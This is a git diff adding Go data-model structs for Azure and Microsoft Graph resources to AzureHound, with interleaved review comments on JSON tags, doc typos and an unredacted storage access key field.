+
+ // The unique identifier for the application that is assigned to an application by Azure AD. Not nullable. Read-only.
+ AppId string `json:"appId,omitempty"`
+
+ // Unique identifier of the applicationTemplate.
+ ApplicationTemplateId string `json:"applicationTemplateId,omitempty"`
+
+ // The collection of roles assigned to the application.
+ // With app role assignments, these roles can be assigned to users, groups, or service principals associated with
+ // other applications. Not nullable.
+ AppRoles []AppRole `json:"appRoles,omitempty"`
+
+ // The date and time the application was registered.
+ // The DateTimeOffset type represents date and time information using ISO 8601 format and is always in UTC time.
+ // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. Read-only.
+ //
+ // Supports $filter (eq, ne, NOT, ge, le, in) and $orderBy.
+ CreatedDateTime string `json:"createdDateTime,omitempty"`
+
+ // The date and time the application was deleted. The DateTimeOffset type represents date and time information using
+ // ISO 8601 format and is always in UTC time. For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z.
+ // Read-only.
+ DeletedDateTime string `json:"deletedDateTime,omitempty"`
+
+ // An optional description of the application.
+ // Supports $filter (eq, ne, NOT, ge, le, startsWith) and $search.
+ Description string `json:"description,omitempty"`
+
+ // Specifies whether Microsoft has disabled the registered application.
+ // Possible values are: null (default value), NotDisabled, and DisabledDueToViolationOfServicesAgreement
+ // (reasons may include suspicious, abusive, or malicious activity, or a violation of the Microsoft Services
+ // Agreement).
+ DisabledByMicrosoftStatus string `json:"disabledByMicrosoftStatus,omitempty"`
+
+ // The display name for the application.
+ // Supports $filter (eq, ne, NOT, ge, le, in, startsWith), $search, and $orderBy.
+ DisplayName string `json:"displayName,omitempty"`
+
+ // Configures the groups claim issued in a user or OAuth 2.0 access token that the application expects.
+ // To set this attribute, use one of the following valid string values:
+ // - None
+ // - SecurityGroup (for security groups and Azure AD roles)
+ // - All (this gets all of the security groups, distribution groups, and Azure AD directory roles that the signed-in user is a member of)
+ GroupMembershipClaims string `json:"groupMembershipClaims,omitempty"`
+
+ // The URIs that identify the application within its Azure AD tenant, or within a verified custom domain if the
+ // application is multi-tenant. For more information see Application Objects and Service Principal Objects.
+ // The any operator is required for filter expressions on multi-valued properties.
+ // Not nullable.
+ // Supports $filter (eq, ne, ge, le, startsWith).
+ IdentifierUris []string `json:"identifierUris,omitempty"`
+
+ // Basic profile information of the application such as app's marketing, support, terms of service and privacy
+ // statement URLs. The terms of service and privacy statement are surfaced to users through the user consent
+ // experience. For more info, see How to: Add Terms of service and privacy statement for registered Azure AD apps.
+ // Supports $filter (eq, ne, NOT, ge, le).
+ Info InformationalUrl `json:"info,omitempty"`
+
+ // Specifies whether this application supports device authentication without a user.
+ // The default is false.
+ IsDeviceOnlyAuthSupported bool `json:"isDeviceOnlyAuthSupported,omitempty"`
+
+ // Specifies the fallback application type as public client, such as an installed application running on a mobile
+ // device.
+ // The default value is false which means the fallback application type is confidential client such as a web app.
+ // There are certain scenarios where Azure AD cannot determine the client application type. For example, the ROPC
+ // flow where it is configured without specifying a redirect URI. In those cases Azure AD interprets the application
+ // type based on the value of this property.
+ IsFallbackPublicClient bool `json:"isFallbackPublicClient,omitempty"`
+
+ // The collection of key credentials associated with the application.
+ // Not nullable.
+ // Supports $filter (eq, NOT, ge, le).
+ KeyCredentials []KeyCredential `json:"keyCredentials,omitempty"`
+
+ // The main logo for the application. Not nullable.
+ // Base64Url encoded.
+ Logo string `json:"logo,omitempty"`
+
+ // Notes relevant for the management of the application.
+ Notes string `json:"notes,omitempty"`
+
+ // Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests.
+ // The default is false, which specifies that only GET requests are allowed.
+ OAuth2RequiredPostResponse bool `json:"oauth2RequiredPostResponse,omitempty"`
+
+ // Application developers can configure optional claims in their Azure AD applications to specify the claims that
+ // are sent to their application by the Microsoft security token service.
+ // For more information, see How to: Provide optional claims to your app.
+ OptionalClaims OptionalClaims `json:"optionalClaims,omitempty"`
+
+ // Specifies parental control settings for an application.
+ ParentalControlSettings ParentalControlSettings `json:"parentalControlSettings,omitempty"`
+
+ // The collection of password credentials associated with the application. Not nullable.
+ PasswordCredentials []PasswordCredential `json:"passwordCredentials,omitempty"`
+
+ // Specifies settings for installed clients such as desktop or mobile devices.
+ PublicClient PublicClientApplication `json:"publicClient,omitempty"`
+
+ // The verified publisher domain for the application. Read-only.
+ // For more information, see How to: Configure an application's publisher domain.
+ // Supports $filter (eq, ne, ge, le, startsWith).
+ PublisherDomain string `json:"publisherDomain,omitempty"`
+
+ // Specifies the resources that the application needs to access.
+ // This property also specifies the set of delegated permissions and application roles that it needs for each of
+ // those resources. This configuration of access to the required resources drives the consent experience. No more
+ // than 50 resource services (APIs) can be configured. Beginning mid-October 2021, the total number of required
+ // permissions must not exceed 400. Not nullable.
+ RequiredResourceAccess []RequiredResourceAccess `json:"requiredResourceAccess,omitempty"`
+
+ // Specifies the Microsoft accounts that are supported for the current application.
+ // The possible values are: AzureADMyOrg, AzureADMultipleOrgs, AzureADandPersonalMicrosoftAccount (default), and
+ // PersonalMicrosoftAccount. See more in the table below.
+ SignInAudience string `json:"signInAudience,omitempty"`
+
+ // Specifies settings for a single-page application, including sign out URLs and redirect URIs for authorization
+ // codes and access tokens.
+ SPA SPAApplication `json:"spa,omitempty"`
+
+ // Custom strings that can be used to categorize and identify the application. Not nullable.
+ Tags []string `json:"tags,omitempty"`
+
+ // Specifies the keyId of a public key from the keyCredentials collection.
+ // When configured, Azure AD encrypts all the tokens it emits by using the key this property points to. The
+ // application code that receives the encrypted token must use the matching private key to decrypt the token before
+ // it can be used for the signed-in user.
+ TokenEncryptionKeyId string `json:"tokenEncryptionKeyId,omitempty"`
+
+ // Specifies the verified publisher of the application.
+ VerifiedPublisher VerifiedPublisher `json:"verifiedPublisher,omitempty"`
+
+ // Specifies settings for a web application.
+ Web WebApplication `json:"web,omitempty"`
+}
diff --git a/models/azure/assigned_label.go b/models/azure/assigned_label.go
new file mode 100644
index 0000000..c5e2f84
--- /dev/null
+++ b/models/azure/assigned_label.go
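Review bot: The tag on `Application.OAuth2RequiredPostResponse` reads `oauth2RequiredPostResponse`, whereas Microsoft Graph names the property `oauth2RequirePostResponse` (worth confirming against the reference linked in the type comment). If that is right, the key never matches on decode and the field always reports false, which hides a setting that affects how the app accepts token requests. I would change the tag to `json:"oauth2RequirePostResponse,omitempty"`. Separately, the `SignInAudience` comment ends with "See more in the table below", but no table follows in this file, so that sentence should be dropped or replaced by a link.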
@@ -0,0 +1,31 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Represents a sensitivity label assigned to a Microsoft 365 group. Sensitivity labels allow administrators to enforce
+// specific group settings on a group by assigning a classification to the group (such as Confidential, Highly Confidential
+// or General). Sensitivity labels are published by administrators in Microsoft 365 Security & Compliance Center as part
+// of Microsoft Information Protection capabilities.
+// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/assignedlabel?view=graph-rest-1.0
+type AssignedLabel struct {
+ // The unique identifier of the label.
+ LabelId string `json:"labelId,omitempty"`
+
+ // The display name of the label. Read-only.
+ DisplayName string `json:"displayName,omitempty"`
+}
diff --git a/models/azure/assigned_license.go b/models/azure/assigned_license.go
new file mode 100644
index 0000000..71cd310
--- /dev/null
+++ b/models/azure/assigned_license.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/gofrs/uuid"
+
+// Represents a license assigned to a user.
+type AssignedLicense struct {
+ // A collection of the unique identifiers for plans that have been disabled.
+ DisabledPlans []uuid.UUID `json:"disabledPlans,omitempty"`
+
+ // The unique identifier for the SKU.
+ SkuId uuid.UUID `json:"skuId,omitempty"`
+}
diff --git a/models/azure/assigned_plan.go b/models/azure/assigned_plan.go
new file mode 100644
index 0000000..fa5809f
--- /dev/null
+++ b/models/azure/assigned_plan.go
@@ -0,0 +1,38 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/gofrs/uuid"
+)
+
+// Represents a plan assigned to user and organization entities.
+type AssignedPlan struct {
+ // The date and time at which the plan was assigned using ISO 8601 format.
+ AssignedDateTime string `json:"assignedDateTime,omitempty"`
+
+ // Condition of the capability assignment.
+ CapabilityStatus enums.CapabiltyStatus `json:"capabilityStatus,omitempty"`
+
+ // The name of the service.
+ Service string `json:"service,omitempty"`
+
+ // A GUID that identifies the service plan.
+ ServicePlanId uuid.UUID `json:"servicePlanId,omitempty"`
+}
diff --git a/models/azure/auto_heal_rules.go b/models/azure/auto_heal_rules.go
new file mode 100644
index 0000000..8c181a2
--- /dev/null
+++ b/models/azure/auto_heal_rules.go
@@ -0,0 +1,75 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+type AutoHealRules struct {
+ Actions AutoHealActions `json:"actions,omitempty"`
+ Triggers AutoHealTriggers `json:"triggers,omitempty"`
+}
+
+type AutoHealActions struct {
+ ActionType enums.AutoHealActionType `json:"actionType,omitempty"`
+ CustomAction AutoHealCustomAction `json:"customAction,omitempty"`
+ MinProcessExecutionTime string `json:"minProcessExecutionTime,omitempty"`
+}
+
+type AutoHealCustomAction struct {
+ Exe string `json:"exe,omitempty"`
+ Parameters string `json:"parameters,omitempty"`
+}
+
+type AutoHealTriggers struct {
+ PrivateBytesInKB int `json:"privateBytesInKB,omitempty"`
+ Requests RequestsBasedTrigger `json:"requests,omitempty"`
+ SlowRequests SlowRequestsBasedTrigger `json:"slowRequests,omitempty"`
+ SlowRequestsWithPath []SlowRequestsBasedTrigger `json:"slowRequestsWithPath,omitempty"`
+ StatusCodes []StatusCodesBasedTrigger `json:"statusCodes,omitempty"`
+ StatusCodesRange []StatusCodesRangeBasedTrigger `json:"statusCodesRange,omitempty"`
+}
+
+type RequestsBasedTrigger struct {
+ Count int `json:"count,omitempty"`
+ TimeInterval string `json:"timeinterval,omitempty"`
+}
+
+type SlowRequestsBasedTrigger struct {
+ Count int `json:"count,omitempty"`
+ Path string `json:"path,omitempty"`
+ TimeInterval string `json:"timeInterval,omitempty"`
+ TimeTaken string `json:"timeTaken,omitempty"`
+}
+
+type StatusCodesBasedTrigger struct {
+ Count int `json:"count,omitempty"`
+ Path string `json:"path,omitempty"`
+ Status int `json:"status,omitempty"`
+ SubStatus int `json:"subStatus,omitempty"`
+ TimeInterval string `json:"timeInterval,omitempty"`
+ Win32Status int `json:"win32Status,omitempty"`
+}
+
+type StatusCodesRangeBasedTrigger struct {
+ Count int `json:"count,omitempty"`
+ Path string `json:"path,omitempty"`
+ StatusCodes string `json:"statusCodes,omitempty"`
+ TimeInterval string `json:"timeInterval,omitempty"`
+}
diff --git a/models/azure/automatic_replies_setting.go b/models/azure/automatic_replies_setting.go
new file mode 100644
index 0000000..f500ce6
--- /dev/null
+++ b/models/azure/automatic_replies_setting.go
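Review bot: `RequestsBasedTrigger.TimeInterval` is tagged `json:"timeinterval,omitempty"`, while the three sibling trigger types in this file use `timeInterval`. Decoding still works because encoding/json matches keys case-insensitively, but the marshalled output uses a different key for this one type, which is easy to miss in anything that consumes the collected data. I would change it to `json:"timeInterval,omitempty"`. None of the types in this file has a doc comment; `AutoHealCustomAction` in particular deserves one line stating that `Exe` and `Parameters` name an executable and its arguments (presumably what the platform runs when a trigger fires), since that is the part a reviewer of collected configurations will want to look at.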
@@ -0,0 +1,45 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+// Configuration settings to automatically notify the sender of an incoming email with a message from the signed-in
+// user.
+type AutomaticRepliesSetting struct {
+ // The set of audience external to the signed-in user's organization who will receive the {@link
+ // ExternalReplyMessage}.
+ ExternalAudience enums.ExternalAudienceScope `json:"externalAudience,omitempty"`
+
+ // The automatic reply to send to the specified eternal audience.
+ ExternalReplyMessage string `json:"externalReplyMessage,omitempty"`
+
+ // The automatic reply to send to the audience internal to the signed-in user's organization.
+ InternalReplyMessage string `json:"internalReplyMessage,omitempty"`
+
+ // The date and time that automatic replies are set to end.
+ ScheduledEndDateTime DateTimeTimeZone `json:"scheduledEndDateTime,omitempty"`
+
+ // The date and time that automatic replies are set to begin.
+ ScheduledStartDateTime DateTimeTimeZone `json:"scheduledStartDateTime,omitempty"`
+
+ // Configuration status for automatic replies.
+ Status enums.AutoReplyStatus `json:"status,omitempty"`
+}
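Review bot: Two comments in `AutomaticRepliesSetting` need fixing. The one on `ExternalReplyMessage` says "eternal audience" where "external audience" is meant, and the one on `ExternalAudience` uses the Javadoc form `{@link ExternalReplyMessage}`, which Go doc tooling prints literally. I would write `// The automatic reply to send to the specified external audience.` and refer to the field by its plain name, `ExternalReplyMessage`, in the other comment.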
diff --git a/models/azure/automation_account.go b/models/azure/automation_account.go
new file mode 100644
index 0000000..c952a38
--- /dev/null
+++ b/models/azure/automation_account.go
@@ -0,0 +1,52 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "strings"
+
+// Mapped according to https://docs.microsoft.com/en-us/rest/api/automation/automation-account/get?tabs=HTTP#automationaccount
+type AutomationAccount struct {
+ Entity
+
+ Etag string `json:"etag,omitempty"`
+ Identity ManagedIdentity `json:"identity,omitempty"`
+ Location string `json:"location,omitempty"`
+ Name string `json:"name,omitempty"`
+ Properties AutomationAccountProperties `json:"properties,omitempty"`
+ SystemData AutomationAccountSystemData `json:"systemData,omitempty"`
+ Tags map[string]string `json:"tags,omitempty"`
+ Type string `json:"type,omitempty"`
+}
+
+func (s AutomationAccount) ResourceGroupName() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 4 {
+ return parts[4]
+ } else {
+ return ""
+ }
+}
+
+func (s AutomationAccount) ResourceGroupId() string {
+ parts := strings.Split(s.Id, "/")
+ if len(parts) > 5 {
+ return strings.Join(parts[:5], "/")
+ } else {
+ return ""
+ }
+}
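Review bot: `ResourceGroupId` and `ResourceGroupName` disagree on how many path segments they require. `ResourceGroupId` returns a value only when `len(parts) > 5`, although `parts[:5]` needs just five elements, while `ResourceGroupName` accepts `len(parts) > 4`, so an Id that stops at the resource-group segment yields a name but an empty id. For an automation account the Id is presumably always longer, but the two bounds should match: `if len(parts) > 4 { return strings.Join(parts[:5], "/") }`. Neither method checks that `parts[3]` is the `resourceGroups` segment, so any Id of another shape returns whatever sits at index 4; a case-insensitive check there would keep a malformed Id from producing a wrong resource-group association. The `else` after `return` can be dropped in both.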
diff --git a/models/azure/automation_account_properties.go b/models/azure/automation_account_properties.go
new file mode 100644
index 0000000..e201a92
--- /dev/null
+++ b/models/azure/automation_account_properties.go
@@ -0,0 +1,34 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type AutomationAccountProperties struct {
+ AutomationHybridServiceUrl string `json:"automationHybridServiceUrl,omitempty"`
+ CreationTime string `json:"creationTime,omitempty"`
+ Description string `json:"description,omitempty"`
+ DisableLocalAuth bool `json:"disableLocalAuth,omitempty"`
+ Encryption AutomationAccountEncryptionProperties `json:"encryption,omitempty"`
+ LastModifiedBy string `json:"lastModifiedBy,omitempty"`
+ LastModifiedTime string `json:"lastModifiedTime,omitempty"`
+ PrivateEndpointConnections []PrivateEndpointConnection `json:"privateEndpointConnections,omitempty"`
+ PublicNetworkAccess bool `json:"publicNetworkAccess,omitempty"`
+ Sku Sku `json:"sku,omitempty"`
+ State enums.AutomationAccountState `json:"state,omitempty"`
+}
diff --git a/models/azure/automation_account_system_data.go b/models/azure/automation_account_system_data.go
new file mode 100644
index 0000000..4d05998
--- /dev/null
+++ b/models/azure/automation_account_system_data.go
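Review bot: `DisableLocalAuth` and `PublicNetworkAccess` in `AutomationAccountProperties` are plain `bool` fields with `omitempty`, so an explicit `false` from the API and a missing value both decode to `false` and are both dropped when the struct is written out again. These two settings describe the account's exposure, so "public network access is off" should be distinguishable from "not reported" in the collected output. I would declare them as `DisableLocalAuth *bool` and `PublicNetworkAccess *bool`, keeping the tags. The struct also has no doc comment; one line linking the REST reference, as `AutomationAccount` does, would be enough.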
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type AutomationAccountSystemData struct {
+ CreatedAt string `json:"createdAt,omitempty"`
+ CreatedBy string `json:"createdBy,omitempty"`
+ CreatedByType enums.AutomationAccountIdentityType `json:"createdByType,omitempty"`
+ LastModifiedAt string `json:"lastModifiedAt,omitempty"`
+ LastModifiedBy string `json:"lastModifiedBy,omitempty"`
+ LastModifiedByType enums.AutomationAccountIdentityType `json:"lastModifiedByType,omitempty"`
+}
diff --git a/models/azure/available_patch_summary.go b/models/azure/available_patch_summary.go
new file mode 100644
index 0000000..e3a10fe
--- /dev/null
+++ b/models/azure/available_patch_summary.go
@@ -0,0 +1,51 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import (
+ "github.com/bloodhoundad/azurehound/v2/enums"
+)
+
+// Describes the properties of a virtual machine instance view for available patch summary.
+type AvailablePatchSummary struct {
+ // The activity ID of the operation that produced this result. It is used to correlate across CRP and extension logs.
+ AssessmentActivityId string `json:"assessmentActivityId,omitempty"`
+
+ // The number of critical or security patches that have been detected as available and not yet installed.
+ CriticalAndSecurityPatchCount int `json:"criticalAndSecurityPatchCount,omitempty"`
+
+ // The errors that were encountered during execution of the operation. The details array contains the list of them.
+ Error ODataError `json:"error,omitempty"`
+
+ // The UTC timestamp when the operation began.
+ LastModifiedTime string `json:"lastModifiedTime,omitempty"`
+
+ // The number of all available patches excluding critical and security.
+ OtherPatchCount int `json:"otherPatchCount,omitempty"`
+
+ // The overall reboot status of the VM. It will be true when partially installed patches require a reboot to
+ // complete installation but the reboot has not yet occurred.
+ RebootPending bool `json:"rebootPending,omitempty"`
+
+ // The UTC timestamp when the operation began.
+ StartTime string `json:"startTime,omitempty"`
+
+ // The overall success or failure status of the operation. It remains "InProgress" until the operation completes.
+ // At that point it will become "Unknown", "Failed", "Succeeded", or "CompletedWithWarnings."
+ Status enums.PatchStatus `json:"status,omitempty"`
+}
diff --git a/models/azure/azure_files_identity_based_authentication.go b/models/azure/azure_files_identity_based_authentication.go
new file mode 100644
index 0000000..bb25abb
--- /dev/null
+++ b/models/azure/azure_files_identity_based_authentication.go
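Review bot: The comment on `LastModifiedTime` is word for word the one on `StartTime` ("The UTC timestamp when the operation began."), so the field's own meaning is left undocumented. Something like `// The UTC timestamp of the last update to this result (TODO: confirm against the API reference).` would separate the two. The type comment should also follow Go doc convention and start with the name: `// AvailablePatchSummary describes the available patch summary of a virtual machine instance view.`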
@@ -0,0 +1,37 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type AzureFilesIdentityBasedAuthentication struct {
+ ActiveDirectoryProperties ActiveDirectoryProperties `json:"activeDirectoryProperties,omitempty"`
+ DefaultSharePermission enums.DefaultSharePermission `json:"defaultSharePermission,omitempty"`
+ DirectoryServiceOptions enums.DirectoryServiceOptions `json:"directoryServiceOptions,omitempty"`
+}
+
+type ActiveDirectoryProperties struct {
+ AccountType string `json:"accountType,omitempty"`
+ AzureStorageSid string `json:"azureStorageSid,omitempty"`
+ DomainGuid string `json:"domainGuid,omitempty"`
+ DomainName string `json:"domainName,omitempty"`
+ DomainSid string `json:"domainSid,omitempty"`
+ ForestName string `json:"forestName,omitempty"`
+ NetBiosDomainName string `json:"netBiosDomainName,omitempty"`
+ SamAccountName string `json:"samAccountName,omitempty"`
+}
diff --git a/models/azure/azure_storage_info_value.go b/models/azure/azure_storage_info_value.go
new file mode 100644
index 0000000..6aeaa57
--- /dev/null
+++ b/models/azure/azure_storage_info_value.go
@@ -0,0 +1,29 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type AzureStorageInfoValue struct {
+ AccessKey string `json:"accessKey,omitempty"`
+ AccountName string `json:"accountName,omitempty"`
+ MountPath string `json:"mountPath,omitempty"`
+ ShareName string `json:"shareName,omitempty"`
+ State enums.AzureStorageState `json:"state,omitempty"`
+ Type enums.AzureStorageType `json:"type,omitempty"`
+}
diff --git a/models/azure/billing_profile.go b/models/azure/billing_profile.go
new file mode 100644
index 0000000..d8d19e8
--- /dev/null
+++ b/models/azure/billing_profile.go
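Review bot: `AccessKey` holds a storage account key and is marshalled like any other field, so every path that writes this struct to collector output or logs emits the credential in clear text. Nothing in the hunk marks it as sensitive. If the key itself is not needed downstream (not visible here), tagging the field `json:"-"` keeps it out of the output. Otherwise it should at least carry a comment such as `// AccessKey is a credential: redact before logging or exporting.` `ConnectionString` in `models/azure/connection_string_info.go` has the same exposure.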
@@ -0,0 +1,40 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+// Specifies the billing related details of a Azure Spot VM or VMSS.
+type BillingProfile struct {
+
+ // Specifies the maximum price you are willing to pay for a Azure Spot VM/VMSS. This price is in US Dollars.
+ // This price will be compared with the current Azure Spot price for the VM size. Also, the prices are compared at
+ // the time of create/update of Azure Spot VM/VMSS and the operation will only succeed if the maxPrice is greater
+ // than the current Azure Spot price.
+ //
+ // The maxPrice will also be used for evicting a Azure Spot VM/VMSS if the current Azure Spot price goes beyond the
+ // maxPrice after creation of VM/VMSS.
+ //
+ // Possible values are:
+ // - Any decimal value greater than zero. Example: 0.01538
+ // -1 – indicates default price to be up-to on-demand.
+ //
+ // You can set the maxPrice to -1 to indicate that the Azure Spot VM/VMSS should not be evicted for price reasons.
+ // Also, the default max price is -1 if it is not provided by you.
+ //
+ // Minimum api-version: 2019-03-01.
+ MaxPrice float64 `json:"maxPrice,omitempty"`
+}
diff --git a/models/azure/blob_restore_status.go b/models/azure/blob_restore_status.go
new file mode 100644
index 0000000..8da46a8
--- /dev/null
+++ b/models/azure/blob_restore_status.go
@@ -0,0 +1,37 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+import "github.com/bloodhoundad/azurehound/v2/enums"
+
+type BlobRestoreStatus struct {
+ FailureReason string `json:"failureReason,omitempty"`
+ Parameters BlobRestoreParameters `json:"parameters,omitempty"`
+ RestoreId string `json:"restoreId,omitempty"`
+ Status enums.BlobRestoreProgressStatus `json:"status,omitempty"`
+}
+
+type BlobRestoreParameters struct {
+ BlobRanges []BlobRestoreRange `json:"blobRanges,omitempty"`
+ TimeToRestore string `json:"timeToRestore,omitempty"`
+}
+
+type BlobRestoreRange struct {
+ EndRange string `json:"endRange,omitempty"`
+ StartRange string `json:"startRange,omitempty"`
+}
diff --git a/models/azure/boot_diagnostics.go b/models/azure/boot_diagnostics.go
new file mode 100644
index 0000000..532e481
--- /dev/null
+++ b/models/azure/boot_diagnostics.go
@@ -0,0 +1,27 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package azure
+
+type BootDiagnotics struct {
